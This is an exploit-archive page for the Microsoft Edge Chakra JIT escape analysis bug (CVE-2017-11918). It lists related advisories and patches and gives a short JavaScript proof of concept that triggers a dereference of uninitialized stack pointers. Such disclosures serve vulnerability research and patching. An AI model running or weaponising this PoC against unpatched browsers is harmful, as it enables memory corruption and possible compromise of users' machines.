Microsoft Edge Chakra JIT - Escape Analysis Bug Exploi
Reporter | Title | Published | Views | Family All 143 |
---|---|---|---|---|
Packet Storm | Microsoft Edge Chakra JIT Escape Analysis Bug | 10 Jan 201800:00 | â | packetstorm |
Exploit DB | Microsoft Edge Chakra JIT - Escape Analysis Bug | 9 Jan 201800:00 | â | exploitdb |
Symantec | Microsoft Edge Scripting Engine CVE-2017-11918 Remote Memory Corruption Vulnerability | 12 Dec 201700:00 | â | symantec |
Microsoft CVE | Scripting Engine Memory Corruption Vulnerability | 12 Dec 201708:00 | â | mscve |
Microsoft KB | December 12, 2017âKB4053581 (OS Build 10240.17709) | 12 Dec 201708:00 | â | mskb |
Microsoft KB | December 12, 2017âKB4053580 (OS Build 15063.786) | 12 Dec 201708:00 | â | mskb |
Microsoft KB | December 12, 2017âKB4053579 (OS Build 14393.1944) | 12 Dec 201708:00 | â | mskb |
Microsoft KB | December 12, 2017âKB4054517 (OS Build 16299.125) | 12 Dec 201708:00 | â | mskb |
Microsoft KB | December 12, 2017âKB4053578 (OS Build 10586.1295) | 12 Dec 201708:00 | â | mskb |
Veracode | Privilege Escalation | 5 Jul 201802:11 | â | veracode |
/*
Escape analysis: https://en.wikipedia.org/wiki/Escape_analysis
Chakra fails to detect if "tmp" escapes the scope, allocates it to the stack. This may lead to dereference uninitialized stack values.
PoC:
*/
function opt() {
let tmp = [];
tmp[0] = tmp;
return tmp[0];
}
function main() {
for (let i = 0; i < 0x1000; i++) {
opt();
}
print(opt()); // deref uninitialized stack pointers!
}
main();
# 0day.today [2018-03-01] #
Transform Your Security Services
Elevate your offerings with Vulners' advanced Vulnerability Intelligence. Contact us for a demo and discover the difference comprehensive, actionable intelligence can make in your security strategy.
Book a live demo